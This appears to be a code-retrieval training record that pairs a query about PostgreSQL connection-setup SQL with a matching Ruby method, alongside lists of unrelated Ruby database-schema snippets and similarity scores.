"def add_alphanumeric_name_constraint(table, column = :name)\n sql = <<-SQL\n ALTER TABLE %s ADD CONSTRAINT constraint_name_alphanumeric\n CHECK (%s SIMILAR TO '\\\\w+[\\\\w-]*(\\\\.[\\\\w-]+)*');\n SQL\n\n run sql % [table.to_s, column.to_s]\n end",
"def should_be_wrong_duplicated_name(wrong_song = @wrong_song)\n validate_column_errors(wrong_song, :name, false, 'activerecord.errors.messages.taken')\n end",
"def should_be_wrong_duplicated_name(wrong_album = @wrong_album)\n validate_column_errors(wrong_album, :name, false, 'activerecord.errors.messages.taken')\n end",
"def should_be_wrong_duplicated_name(wrong_artist = @wrong_artist)\n validate_column_errors(wrong_artist, :name, false, 'activerecord.errors.messages.taken')\n end",
"def change_column_required(col_name, required)\r\n raise \"Do not execute this method in client/server mode!\" if \\\r\n @db.client?\r\n\r\n raise \":recno is always required!\" if col_name == :recno\r\n\r\n raise 'Invalid column name: ' % col_name unless \\\r\n @field_names.include?(col_name)\r\n \r\n raise 'Required must be either true or false!' unless \\\r\n [true, false].include?(required)\r\n \r\n @db.engine.change_column_required(self, col_name, required)\r\n \r\n # Need to reinitialize the table instance and associated indexes.\r\n @db.engine.remove_recno_index(@name)\r\n @db.engine.remove_indexes(@name)\r\n\r\n update_header_vars\r\n create_indexes\r\n create_table_class unless @db.server?\r\n end",
"def constraint_name(table_name, relationship_name)\n \"#{table_name}_#{relationship_name}_fk\"\n end",
"def alias_column_method(params)\n logical_name = params[:new]\n original_name = params[:original]\n \n define_method logical_name do\n self.send(original_name)\n end \n \n define_method \"#{logical_name}=\" do |arg|\n self.send(original_name, arg)\n end\n end",
"def supports_external_add_constraints?() false; end",
"def rename(name, new_name)\n @driver.renameRule([name], [new_name])\n end",
"def map_column(old_name, new_name)\n unless @map.include?(old_name)\n raise ActiveRecord::ActiveRecordError, \"column #{old_name} not found, can't be mapped\"\n end\n if new_name.nil?\n @map.delete old_name\n @columns.delete old_name\n else\n @map[old_name] = new_name\n end\n end",
"def map_column(old_name, new_name)\n unless @map.include?(old_name)\n raise ActiveRecord::ActiveRecordError, \"column #{old_name} not found, can't be mapped\"\n end\n if new_name.nil?\n @map.delete old_name\n @columns.delete old_name\n else\n @map[old_name] = new_name\n end\n end",
"def allow_name_change?\n true\n end",
"def rename_column(table_name, column_name, new_column_name)\n execute \"ALTER TABLE #{quote_table_name(table_name)} ALTER #{quote_column_name(column_name)} TO #{quote_column_name(new_column_name)}\"\n end",
"def rename(file, newname)\n raise \"Sorry... 'AimsCalc rename' isn't implemented yet.\"\nend",
"def rename_column(table_name, column_name, new_column_name)\n execute \"ALTER TABLE #{quote_table_name(table_name)} RENAME COLUMN #{quote_column_name(column_name)} TO #{quote_column_name(new_column_name)}\"\n end",
"def rename(old_name, new_name); end",
"def rename(old_name, new_name); end",
"def supports_external_add_constraints?() true; end",
"def validate_query_table_column(query, table, column_name, allowed)\n validate_query(query)\n validate_table(table)\n validate_name(column_name, allowed)\n end",
"def rename_column(table_name, column_name, new_column_name)\n execute \"exec sp_rename '#{table_name}.#{column_name}', '#{new_column_name}'\"\n end",
"def up\n rename_column TABLE_NAME, OLD_COLUMN_NAME, NEW_COLUMN_NAME\n end",
"def up\n rename_column TABLE_NAME, OLD_COLUMN_NAME, NEW_COLUMN_NAME\n end",
"def chrono_rename_temporal_indexes(name, new_name)\n on_temporal_schema do\n temporal_indexes = indexes(new_name)\n temporal_indexes.map(&:name).each do |old_idx_name|\n if old_idx_name =~ /^index_#{name}_on_(?<columns>.+)/\n new_idx_name = \"index_#{new_name}_on_#{$~['columns']}\"\n execute \"ALTER INDEX #{old_idx_name} RENAME TO #{new_idx_name}\"\n end\n end\n end\n end",
"def constraint_name(table, field)\n \"fk_#{table}_#{field_list_name(field)}\"\n end",
"def incompatible_constraint(attribute_names, options = {}, &block)\n constraint = IncompatibleConstraint.new(self, attribute_names, options, &block)\n attribute_names.collect { |a| attribute_by_name(a) }.each do |a|\n error(\"Incompatible constraint #{constraint.name} on #{self.name} has an illegal non nullable attribute\") if !a.nullable?\n end\n add_unique_to_set(\"incompatible\", constraint, @incompatible_constraints)\n end",
"def rename(a, b)\n @@__name_sets[@@__defining][b] = :\"__#{a}\"\n @@__name_sets[:original][a] = :\"__#{a}\"\n\n class<<self\n self\n end.class_eval do\n alias_method :\"__#{a}\", a\n remove_method a\n end\n end",
"def remove_foreign_key(from_table, from_column, to_table)\n constraint_name = \"fk_#{from_table}_#{from_column}\"\n # check if constraint already exist\n count = ActiveRecord::Base.connection.select_value(\"select count(1) from pg_constraint where conname='#{constraint_name}'\")\n\n unless count.to_i == 0\n execute %{ALTER TABLE #{from_table} DROP CONSTRAINT #{constraint_name}}\n end\n end",
"def remove_check(table_name, options)\n name = options.fetch(:name) { raise 'remove_check, :name option required' }\n\n execute <<-SQL\n ALTER TABLE #{quote_table_name(table_name)}\n DROP CONSTRAINT #{quote_column_name(name)}\n SQL\n end",
"def validate_schema\n all_cols1 = @db1.column_names(@table1)\n all_cols2 = @db2.column_names(@table2)\n if all_cols1 != all_cols2\n raise \"Columns do not match, please use full coopy toolbox\"\n end\n\n key_cols1 = @db1.primary_key(@table1)\n key_cols2 = @db2.primary_key(@table2)\n if key_cols1 != key_cols2\n raise \"Primary keys do not match, please use full coopy toolbox\"\n end\n end",
"def validate_schema\n all_cols1 = @db1.column_names(@table1)\n all_cols2 = @db2.column_names(@table2)\n if all_cols1 != all_cols2\n raise \"Columns do not match, please use full coopy toolbox\"\n end\n\n key_cols1 = @db1.primary_key(@table1)\n key_cols2 = @db2.primary_key(@table2)\n if key_cols1 != key_cols2\n raise \"Primary keys do not match, please use full coopy toolbox\"\n end\n end",
"def validate_schema\n all_cols1 = @db1.column_names(@table1)\n all_cols2 = @db2.column_names(@table2)\n if all_cols1 != all_cols2\n raise \"Columns do not match, please use full coopy toolbox\"\n end\n\n key_cols1 = @db1.primary_key(@table1)\n key_cols2 = @db2.primary_key(@table2)\n if key_cols1 != key_cols2\n raise \"Primary keys do not match, please use full coopy toolbox\"\n end\n end",
"def set_column_conflict!(column)\n @set_column_conflicts[:\"#{column}=\"] = @set_column_conflicts[\"#{column}=\"] = column.to_sym\n end",
"def rename_columns(table_name, columns_old_new_create)\n temporary_table_name = \"#{table_name}_temp\"\n\n DataMapper::Transaction.new(adapter).commit do\n adapter.execute(\n \"ALTER TABLE #{quote table_name} \"\\\n \"RENAME TO #{quote temporary_table_name}\"\n )\n\n create_table table_name do\n columns_old_new_create.each do |_old, new, *options|\n column new, *options\n end\n end\n\n columns_old = columns_old_new_create.map { |c| quote c[0] }\n columns_new = columns_old_new_create.map { |c| quote c[1] }\n\n adapter.execute(\n \"INSERT INTO #{quote table_name}\" +\n \"(#{columns_new.join(',')}) \" +\n \"SELECT #{columns_old.join(',')} \" +\n \"FROM #{quote temporary_table_name}\")\n\n drop_table temporary_table_name\n end\n end",
"def rename_column(table_name, column_name, new_column_name) #:nodoc:\n clear_cache!\n execute \"ALTER TABLE #{quote_table_name(table_name)} RENAME COLUMN #{quote_column_name(column_name)} TO #{quote_column_name(new_column_name)}\"\n end",
"def apply_schema_transformations\n # replace_exclusive_indicators_by_discriminators\n end",
"def move_unique_constraints\n unique_constraints = []\n\n # Removes the ADD CONSTRAINT statements and stores their info.\n dump.gsub!(/^-- Name: [\\w\\s]+?(?<name>\\w+); Type: CONSTRAINT[\\s-]+ALTER TABLE ONLY (?<table>[\\w.]+)\\s+ADD CONSTRAINT \\k<name> UNIQUE (?<columns>[^;]+);$/) do\n unique_constraints.push([$LAST_MATCH_INFO[:table], $LAST_MATCH_INFO[:name], $LAST_MATCH_INFO[:columns]])\n\n ''\n end\n\n # Adds the UNIQUE contstraint to the table definitions.\n unique_constraints.each do |table, name, columns|\n dump.gsub!(/^(?<statement>CREATE TABLE #{table} \\(.*?\\);)/m) do\n constraint = \"CONSTRAINT #{name} UNIQUE #{columns}\"\n \"#{$LAST_MATCH_INFO[:statement].sub(/\\n\\);\\z/, \",\\n #{constraint}\\n);\")}\"\n end\n end\n end",
"def validate_column(column)\n unless column.is_a?(Symbol) || column.is_a?(Arel::Nodes::SqlLiteral)\n column = column.to_s\n unless /\\A\\w+(\\.\\w+)?\\z/i.match(column)\n warn \"[groupdate] Non-attribute argument: #{column}. Use Arel.sql() for known-safe values. This will raise an error in Groupdate 6\"\n end\n end\n column\n end",
"def validate_unique *colnames\n\t\t\tcolnames.each { |colname|\n\t\t\t\tds = self.class.where colname => send(colname)\n\t\t\t\tds.filter!(~{primary_key => send(primary_key)}) unless new?\n\t\t\t\tif ds.count > 0\n\t\t\t\t\terrors.add(colname, 'must be unique.')\n\t\t\t\tend\n\t\t\t}\n\t\tend",
"def functional_update_schema # abstract\n raise 'abstract'\n end",
"def renameable(attribute = :name)\n define_method :renamed do |renamer|\n send :\"with_#{attribute}\", renamer.new_name_of(send(attribute))\n end\n end",
"def rename oldname, newname\n add \"mv #{oldname} #{newname}\", check_file(newname)\n end",
"def drop_constraint(table, name)\n current_instructions << Instructions::DropConstraint.new(\n table: table,\n name: name,\n )\n end",
"def test_keeping_default_and_notnull_constraints_on_change\n connection.create_table :testings do |t|\n t.column :title, :string\n end\n person_klass = Class.new(ActiveRecord::Base)\n person_klass.table_name = \"testings\"\n\n person_klass.connection.add_column \"testings\", \"wealth\", :integer, null: false, default: 99\n person_klass.reset_column_information\n assert_equal 99, person_klass.column_defaults[\"wealth\"]\n assert_equal false, person_klass.columns_hash[\"wealth\"].null\n assert_nothing_raised { person_klass.connection.execute(\"insert into testings (title) values ('tester')\") }\n\n # change column default to see that column doesn't lose its not null definition\n person_klass.connection.change_column_default \"testings\", \"wealth\", 100\n person_klass.reset_column_information\n assert_equal 100, person_klass.column_defaults[\"wealth\"]\n assert_equal false, person_klass.columns_hash[\"wealth\"].null\n\n # rename column to see that column doesn't lose its not null and/or default definition\n person_klass.connection.rename_column \"testings\", \"wealth\", \"money\"\n person_klass.reset_column_information\n assert_nil person_klass.columns_hash[\"wealth\"]\n assert_equal 100, person_klass.column_defaults[\"money\"]\n assert_equal false, person_klass.columns_hash[\"money\"].null\n\n # change column\n person_klass.connection.change_column \"testings\", \"money\", :integer, null: false, default: 1000\n person_klass.reset_column_information\n assert_equal 1000, person_klass.column_defaults[\"money\"]\n assert_equal false, person_klass.columns_hash[\"money\"].null\n\n # change column, make it nullable and clear default\n person_klass.connection.change_column \"testings\", \"money\", :integer, null: true, default: nil\n person_klass.reset_column_information\n assert_nil person_klass.columns_hash[\"money\"].default\n assert_equal true, person_klass.columns_hash[\"money\"].null\n\n # change_column_null, make it not nullable and set null values to a default value\n person_klass.connection.execute(\"UPDATE testings SET money = NULL\")\n person_klass.connection.change_column_null \"testings\", \"money\", false, 2000\n person_klass.reset_column_information\n assert_nil person_klass.columns_hash[\"money\"].default\n assert_equal false, person_klass.columns_hash[\"money\"].null\n assert_equal 2000, connection.select_values(\"SELECT money FROM testings\").first.to_i\n end",
"def compress_index_name(name)\n method_index = 0\n new_name = name\n while new_name.length > 63 && method_index >= 0\n # ap \"[#{method_index}] #{new_name}\"\n case method_index\n when 0\n # change polymorphic index to just name\n table_part, column_part = new_name.split('_on_')\n columns = column_part.split('_and_')\n polys = columns.select{|e| e.include?('_type') && columns.include?(e.sub('_type','_id')) }\n if polys.any?\n polys.each do |poly|\n poly = poly.split('_').first\n columns[columns.index(\"#{poly}_type\")] = poly\n columns.delete(\"#{poly}_id\")\n end\n new_name = \"#{table_part}_on_#{columns.join(\"_and_\")}\"\n end\n method_index += 1\n when 1\n # change index to idx\n new_name = name.sub(\"index_\",\"ix_\")\n method_index += 1\n when 2\n # remove common strings from column names\n column_part = new_name.split('_on_').last\n columns = column_part.split('_and_')\n if columns.size > 1 && (common_str = longest_common_substr(columns))\n common_str = common_str.sub(/_at|_id/,'')\n if common_str.size > 2\n ap \"common_str: #{common_str}\"\n new_name = new_name.gsub(common_str, '')\n end\n end\n method_index += 1\n when 3\n # remove the leading parts of the table name\n table_name = new_name.match(/ix_(.*)_on.*/)[1]\n parts = table_name.split('_')\n if parts.size > 1\n parts.shift\n new_table_name = parts.join('_')\n new_name = new_name.sub(\"ix_#{table_name}_on\",\"ix_#{new_table_name}_on\")\n else\n method_index += 1\n end\n when 4\n # hash the columns used in the index\n columns = new_name.split('_on_').last\n hash = Digest::MD5.base64digest(columns)[0..-3]\n new_name = new_name.sub(columns, hash) \n method_index += 1\n when 5\n # change table name to hash\n table_name = new_name.match(/ix_(.*)_on.*/)[1]\n hash = Digest::MD5.base64digest(table_name)[0..-3]\n if table_name.size > hash.size\n new_name = new_name.sub(table_name, hash)\n end\n method_index += 1\n else\n method_index = -99\n end\n end\n new_name\n end",
"def handle_duplicate_columns(cols)\n message = \"#{caller(*CALLER_ARGS).first}: One or more duplicate columns present in #{cols.inspect}\"\n\n case duplicate_columns_handler_type(cols)\n when :raise\n raise DuplicateColumnError, message\n when :warn\n warn message\n end\n end",
"def sanitize_columns!\n column_names = @db_connection.schema(@current_name, {:schema => @target_schema}).map{ |s| s[0].to_s }\n sanitize(column_names)\n end",
"def database_specific_error_class(exception, opts)\n case exception.errno\n when 1048\n NotNullConstraintViolation\n when 1062\n UniqueConstraintViolation\n when 1451, 1452\n ForeignKeyConstraintViolation\n else\n super\n end\n end",
"def rename!(*arguments)\n Hash[*arguments.flatten].each_pair do |from,to|\n if fields.has_key?(from) && !fields.has_key?(to)\n fields[to] = fields[from]\n fields.delete(from)\n end\n end\n self\n end",
"def validate_slug_columns\n raise ArgumentError, \"Source column '#{self.slug_source}' does not exist!\" if !self.respond_to?(self.slug_source)\n raise ArgumentError, \"Slug column '#{self.slug_column}' does not exist!\" if !self.respond_to?(\"#{self.slug_column}=\")\n end",
"def rename(renames)\n operations = renames.inject({}) do |ops, (old_name, new_name)|\n ops[old_name] = new_name.to_s\n ops\n end\n view.update_many(\"$rename\" => collect_operations(operations))\n end",
"def rename_comparison(old_name, new_name)\n if @handle.ptr == nil\n raise \"this is disposed\"\n end\n result = Native.RunEditor_rename_comparison(@handle.ptr, old_name, new_name)\n result\n end",
"def create_constraints(drop = nil)\n contraints = {\n \"Page\" => [:page_id],\n \"Term\" => [:uri]\n }\n contraints.each do |label, fields|\n fields.each do |field|\n begin\n name = 'o'\n name = label.downcase if drop && drop == :drop\n query(\n \"#{drop && drop == :drop ? 'DROP' : 'CREATE'} CONSTRAINT ON (#{name}:#{label}) ASSERT #{name}.#{field} IS UNIQUE;\"\n )\n rescue Neography::NeographyError => e\n raise e unless e.message =~ /already exists/ || e.message =~ /No such constraint/\n end\n end\n end\n end",
"def columnName_to_fieldname (name)\n return name.downcase.gsub(' ','-')\nend",
"def test_some_invalid_columns\n process :nasty_columns_1\n assert_response :success\n\n assert_deprecated_assertion { assert_invalid_record 'company' }\n assert_deprecated_assertion { assert_invalid_column_on_record 'company', 'rating' }\n assert_deprecated_assertion { assert_valid_column_on_record 'company', 'name' }\n assert_deprecated_assertion { assert_valid_column_on_record 'company', %w(name id) }\n end",
"def validate_columns\n columns.each do |name|\n if !column_available?(name)\n errors.add column_label_for(name), :inclusion\n end\n end if columns.present?\n end",
"def rename_table_sql(name, new_name)\n \"ALTER TABLE #{quote_schema_table(name)} RENAME TO #{quote_identifier(schema_and_table(new_name).last)}\"\n end",
"def setup_auto_validations\n not_null_cols, explicit_not_null_cols = db_schema.select{|col, sch| sch[:allow_null] == false}.partition{|col, sch| sch[:default].nil?}.map{|cs| cs.map{|col, sch| col}}\n @auto_validate_not_null_columns = not_null_cols - Array(primary_key)\n explicit_not_null_cols += Array(primary_key)\n @auto_validate_explicit_not_null_columns = explicit_not_null_cols.uniq\n @auto_validate_max_length_columns = db_schema.select{|col, sch| sch[:type] == :string && sch[:max_length].is_a?(Integer)}.map{|col, sch| [col, sch[:max_length]]}\n table = dataset.first_source_table\n @auto_validate_unique_columns = if db.supports_index_parsing? && [Symbol, SQL::QualifiedIdentifier, SQL::Identifier, String].any?{|c| table.is_a?(c)}\n db.indexes(table).select{|name, idx| idx[:unique] == true}.map{|name, idx| idx[:columns].length == 1 ? idx[:columns].first : idx[:columns]}\n else\n []\n end\n end",
"def renamenx(old_name, new_name); end",
"def renamenx(old_name, new_name); end",
"def column_numerical_constraints(column, options)\n validators = column.active_record_class.validators.select do |v|\n v.is_a?(ActiveModel::Validations::NumericalityValidator) &&\n v.attributes.include?(column.name) &&\n !v.options[:if] && !v.options[:unless]\n end\n\n equal_validator = validators.find { |v| v.options[:equal_to] }\n # If there is equal_to constraint - use it (unless otherwise specified by user)\n if equal_validator && !(options[:min] || options[:max])\n equal_to = equal_validator.options[:equal_to]\n return {min: equal_to, max: equal_to}\n end\n\n numerical_constraints = {}\n\n # find minimum and maximum from validators\n # we can safely modify :min and :max by 1 for :greater_tnan or :less_than value only for integer values\n only_integer = column.column.type == :integer if column.column\n only_integer ||= validators.find { |v| v.options[:only_integer] }.present?\n margin = only_integer ? 1 : 0\n\n # Minimum\n unless options[:min]\n min = validators.map { |v| v.options[:greater_than_or_equal_to] }.compact.max\n greater_than = validators.map { |v| v.options[:greater_than] }.compact.max\n numerical_constraints[:min] = [min, (greater_than + margin if greater_than)].compact.max\n end\n\n # Maximum\n unless options[:max]\n max = validators.map { |v| v.options[:less_than_or_equal_to] }.compact.min\n less_than = validators.map { |v| v.options[:less_than] }.compact.min\n numerical_constraints[:max] = [max, (less_than - margin if less_than)].compact.min\n end\n\n # Set step = 2 for column values restricted to be odd or even (but only if minimum is set)\n unless options[:step]\n only_odd_valid = validators.any? { |v| v.options[:odd] }\n only_even_valid = validators.any? { |v| v.options[:even] } unless only_odd_valid\n if !only_integer\n numerical_constraints[:step] ||= \"0.#{'0' * (column.column.scale - 1)}1\" if column.column&.scale.to_i.positive?\n elsif options[:min] && options[:min].respond_to?(:even?) && (only_odd_valid || only_even_valid)\n numerical_constraints[:step] = 2\n numerical_constraints[:min] += 1 if only_odd_valid && options[:min].even?\n numerical_constraints[:min] += 1 if only_even_valid && options[:min].odd?\n end\n numerical_constraints[:step] ||= 'any' unless only_integer\n end\n\n numerical_constraints\n end",
"def supports_validate_constraints?\n false\n end",
"def supports_validate_constraints?\n false\n end",
"def validate_on_create=(_arg0); end",
"def rename_column(table_name, column_name, new_column_name, options = {}) #:nodoc:\n column_info = select_one(\"SHOW FULL FIELDS FROM #{table_name} LIKE '#{column_name}'\")\n current_type = column_info[\"Type\"]\n options[:comment] ||= column_info[\"Comment\"]\n sql = \"ALTER TABLE #{table_name} CHANGE #{column_name} #{new_column_name} #{current_type}\"\n sql << \" COMMENT #{quote(options[:comment])}\" unless options[:comment].blank?\n execute sql\n end",
"def rename_field dirty_key, opts={}\n do_token = opts[:auto_tokenize]\n do_token = self.auto_tokenize? if do_token.nil?\n to_field = opts[:field_renames] || self.field_renames\n clean_key = format_field(dirty_key)\n field_key = to_field[clean_key]\n field_key = do_token if field_key.nil? and (not do_token.nil?)\n case field_key\n when Symbol then field_key\n when true then clean_key.to_sym\n when false then clean_key\n else\n raise ArgumentError, \"Unknown Auto Rename Field Value: #{clean_key}\"\n end\n end",
"def chrono_rename_history_indexes(name, new_name)\n on_history_schema do\n standard_index_names = %w(\n inherit_pkey instance_history pkey\n recorded_at timeline_consistency )\n\n old_names = temporal_index_names(name, :validity) +\n standard_index_names.map {|i| [name, i].join('_') }\n\n new_names = temporal_index_names(new_name, :validity) +\n standard_index_names.map {|i| [new_name, i].join('_') }\n\n old_names.zip(new_names).each do |old, new|\n execute \"ALTER INDEX #{old} RENAME TO #{new}\"\n end\n end\n end",
"def column_definition_unique_sql(sql, column)\n if column[:unique]\n if name = column[:unique_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << ' ' << unique_constraint_sql_fragment(column)\n constraint_deferrable_sql_append(sql, column[:unique_deferrable])\n end\n end",
"def move_to_database(column1, column2)\n # column1 and column2 will be symbols\n if Object.const_defined?(column1.to_s.capitalize) # yeilds column\n @model_1 = Object.const_get(column1.to_s.capitalize)\n else\n set_error_message(\"Model \\\"#{column1.to_s.capitalize}\\\" not defined\")\n end\n \n if Object.const_defined?(column2.to_s.capitalize) # yeilds column \n @model_2 = Object.const_get(column2.to_s.capitalize)\n else\n set_error_message(\"Model \\\"#{column2.to_s.capitalize}\\\" not defined\")\n end\n puts self.error_messages.inspect\n end",
"def validator_for(constraint_name)\n validator_name_for(constraint_name).safe_constantize\n end",
"def change_column(table_name, name, new_type)\n column_functional(table_name) do\n change_table_column(name, new_type)\n end\n end"
] |
[
"0.6728584",
"0.65458584",
"0.5705936",
"0.5677713",
"0.56549233",
"0.5590001",
"0.55832726",
"0.55148995",
"0.55096465",
"0.5468966",
"0.5393673",
"0.53134495",
"0.531104",
"0.5295988",
"0.528086",
"0.5262339",
"0.52330846",
"0.5218797",
"0.5215299",
"0.5191192",
"0.5191192",
"0.5169561",
"0.51328546",
"0.5079588",
"0.50703007",
"0.50604784",
"0.50604784",
"0.50498855",
"0.5041326",
"0.5038121",
"0.50030315",
"0.49979284",
"0.49976417",
"0.4994975",
"0.4976363",
"0.49440807",
"0.49336645",
"0.49288058",
"0.49063766",
"0.49039277",
"0.49039277",
"0.48825213",
"0.48730063",
"0.4872136",
"0.48593396",
"0.4853418",
"0.4853418",
"0.48502713",
"0.48402357",
"0.48109117",
"0.48089665",
"0.48089665",
"0.48002625",
"0.4792394",
"0.47872138",
"0.47717375",
"0.47669688",
"0.47477448",
"0.47467667",
"0.47467667",
"0.47467667",
"0.47368073",
"0.47322285",
"0.47088653",
"0.47054458",
"0.47053272",
"0.46976933",
"0.46551755",
"0.46479607",
"0.46478304",
"0.46438974",
"0.46413884",
"0.4635225",
"0.46042183",
"0.46000877",
"0.4597812",
"0.45944288",
"0.45910093",
"0.4590794",
"0.45871827",
"0.45870298",
"0.4585924",
"0.458294",
"0.45751345",
"0.4573348",
"0.45446733",
"0.45417404",
"0.4532974",
"0.4532974",
"0.4532295",
"0.45262346",
"0.45262346",
"0.45107555",
"0.4502549",
"0.44959712",
"0.44933188",
"0.4488058",
"0.44857103",
"0.44774586",
"0.4476898"
] |
0.64177334
|
2
|
The SQL queries to execute when starting a new connection.
|
def connection_configuration_sqls(opts=@opts)
  sqls = []
  sqls << "SET standard_conforming_strings = ON" if typecast_value_boolean(opts.fetch(:force_standard_strings, true))
  cmm = opts.fetch(:client_min_messages, :warning)
  if cmm && !cmm.to_s.empty?
    cmm = cmm.to_s.upcase.strip
    unless VALID_CLIENT_MIN_MESSAGES.include?(cmm)
      raise Error, "Unsupported client_min_messages setting: #{cmm}"
    end
    sqls << "SET client_min_messages = '#{cmm}'"
  end
  if search_path = opts[:search_path]
    case search_path
    when String
      search_path = search_path.split(",").map(&:strip)
    when Array
      # already an array of schema names; use as-is
    else
      raise Error, "unrecognized value for :search_path option: #{search_path.inspect}"
    end
    sqls << "SET search_path = #{search_path.map{|s| "\"#{s.gsub('"', '""')}\""}.join(',')}"
  end
  sqls
end
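# Example (a sketch with hypothetical option values, showing the statements
# this method would return):
#
# connection_configuration_sqls(force_standard_strings: true,
#                               client_min_messages: :notice,
#                               search_path: 'app, public')
# # => ["SET standard_conforming_strings = ON",
# #     "SET client_min_messages = 'NOTICE'",
# #     "SET search_path = \"app\",\"public\""]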
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def sqls\n @mutex.synchronize do\n s = @sqls.dup\n @sqls.clear\n s\n end\n end",
"def prepare_sql_statements\n begin\n databases.each do |db|\n create_query[db][0] = create_query[db][0] + \" \" + create_query[db][1]\n create_query[db].delete_at(1)\n create_query[db] = create_query[db].join(\", \")\n create_query[db] << \");\"\n end\n rescue TypeError => e\n end\n end",
"def sql\n Slacker.sql(self)\n end",
"def connection_execute_method\n :query\n end",
"def connection_execute_method\n :query\n end",
"def perform_query\n Rails.logger.info queries.to_sql\n queries\n end",
"def queries\n qrs = []\n self.each_query {|qr| qrs << qr }\n qrs\n end",
"def cs_starter\n # make_batched_queries\n make_standard_queries\n end",
"def initial_query; end",
"def sql\n @context.sql\n end",
"def execute sql\n db[sql]\n end",
"def snapshots_redact_sql_queries; end",
"def query(statement, *params) #Use of splat(*) parameter used with methods where you don't know how many arguements it will take \n @logger.info \"#{statement}: #{params}\" #Funtionailty for the ability to see in the local host terminal d-bug output from sinatra showing all of the requests it's accepting; this will alow us to see the SQL queries that are being executed in the db to help troubleshoot \n @db.exec_params(statement, params)\n end",
"def snapshots_redact_sql_queries=(_arg0); end",
"def sql\n @sql ||= begin\n bind_params = []\n i = 1\n (selector_keys.length + setter_keys.length).times do\n bind_params << \"$#{i}\"\n i += 1\n end\n hstore_delete_handlers.length.times do\n bind_params << \"$#{i}::text[]\"\n i += 1\n end\n %{SELECT #{name}(#{bind_params.join(', ')})}\n end\n end",
"def sql\n @sql ||= begin\n bind_params = []\n i = 1\n (selector_keys.length + setter_keys.length).times do\n bind_params << \"$#{i}\"\n i += 1\n end\n hstore_delete_handlers.length.times do\n bind_params << \"$#{i}::text[]\"\n i += 1\n end\n %{SELECT #{name}(#{bind_params.join(', ')})}\n end\n end",
"def sql\n @sql ||= begin\n bind_params = []\n 1.upto(selector_keys.length + setter_keys.length) { |i| bind_params << \"$#{i}\" }\n %{SELECT #{name}(#{bind_params.join(', ')})}\n end\n end",
"def sql_modes; end",
"def sql_statement_all\n @sql_statement_all ||=\n <<-SQL\n SELECT\n applications.id AS id,\n teams.name AS team_name,\n projects.name AS project_name,\n (application_data -> :project_id)::int AS project_id,\n application_data -> :signed_off_at AS signed_off_at,\n (application_data -> :signed_off_by)::int AS signed_off_by,\n application_data -> :mentor_fav AS mentor_fav,\n CASE WHEN :project_id::text = 'project1_id' THEN 1 ELSE 2 END AS choice\n FROM applications\n INNER JOIN teams\n ON teams.id = applications.team_id\n INNER JOIN projects\n ON projects.id::text = applications.application_data -> :project_id\n WHERE (application_data -> :project_id)::int IN (:project_ids)\n AND applications.season_id = :season_id;\n SQL\n end",
"def sql sql\n @master.puts \"#{sql};\"\n end",
"def execute(sql)\n @logger.debug(\"SQL: #{sql}\") if @logger\n retrieve_connection.query(sql)\n end",
"def index\n @sql_queries = SqlQuery.all\n end",
"def sql\n @stmt_api.sql\n end",
"def custom_sql(q)\n query = q + ';' unless q =~ /;$/\n query = @db_connection.query(\"#{query}\")\n query.each { |x| print_line(\"#{x.join(',')}\") } unless query.empty?\n end",
"def query(sql)\n database.execute2(sql)\n end",
"def add_queries\n add_general_query\n add_title_query\n add_creators_query\n add_series_query\n add_collected_query\n add_tag_name_query\n end",
"def query(sql, name = nil) #:nodoc:\n log(sql, name) do\n @connection.execute(sql).rows\n end\n end",
"def info_sql\n INFO_SQL\n end",
"def exec_query_dblink_connect\n execute_remote(query_enable_dblink + query_dblink_connect)\n end",
"def execute\n # build the query string\n # run the query\n # return the results\n end",
"def add_sql_data\n sql = {}\n databases.each do |db|\n sql[db] = {}\n sql[db][:create_query] = create_queries[db]\n sql[db][:import_query] = import_queries[db]\n end\n return sql\n end",
"def query sql\n result = db[sql].all\n return result\n end",
"def all\n\t\tquery.execute\n end",
"def create_queries\n gen_rulename\n [\"\n -- FN for sync updates \n CREATE FUNCTION fn_#{suffix}()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n UPDATE #{dest_table}\n SET #{ cols.map{|src, dest| \"\\\"#{dest}\\\" = NEW.\\\"#{src}\\\"\" }.join(', ') }\n WHERE \\\"#{map_dest}\\\" = NEW.\\\"#{map_src}\\\";\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for sync updates\n CREATE TRIGGER tr_#{suffix}\n AFTER INSERT OR UPDATE ON #{src_table} \n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}();\",\n \"\n -- FN for cleaner\n CREATE FUNCTION fn_#{suffix}_cleaner()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n IF OLD.sid = #{sid_src} OR OLD.sid = #{sid_dest} THEN\n #{delete_queries.join(' ')}\n END IF;\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for cleaner\n CREATE TRIGGER tr_#{suffix}_cleaner\n AFTER DELETE ON #{surveys_table}\n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}_cleaner();\n \"]\n end",
"def multiple_query sql\n splited_sql = sql.split(';')\n splited_sql.each do |each_sql|\n query(each_sql)\n end\n end",
"def extract_sql_queries\n sql_queries = Lograge::Sql.store[:lograge_sql_queries]\n return {} unless sql_queries\n\n Lograge::Sql.store[:lograge_sql_queries] = nil\n {\n sql_queries: Lograge::Sql.formatter.call(sql_queries),\n sql_queries_count: sql_queries.length\n }\n end",
"def sql! sql=nil\n require 'niceql'\n puts Niceql::Prettifier.prettify_sql sql || $last_sql_command\n end",
"def execute_query(query)\n ActiveRecord::Base.connection.select_all(query)\n end",
"def query(sql, args=nil)\n args = args.map{|v| @db.bound_variable_arg(v, self)} if args\n check_disconnect_errors{super}\n end",
"def sql_query(sqlquery)\n\t\tActiveRecord::Base.connection.select_all(sqlquery)\n\tend",
"def exec_query(sql, name = 'SQL', binds = [])\n if name == :skip_logging\n #execute(sql, name)\n hash_query(sql, name, binds)\n else\n log(sql, name) do\n #execute(sql, name)\n hash_query(sql, name, binds)\n end\n end \n end",
"def exec(sql)\n Logging.with_logged_query self, sql do\n raw_connection.exec sql\n end\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def do_execute(sql, name = 'SQL')\n log(sql, name) { raw_connection_do(sql) }\n end",
"def log_connection_execute(conn, sql)\n conn.execute(sql)\n end",
"def log_sql\n @opts[:log_sql]\n end",
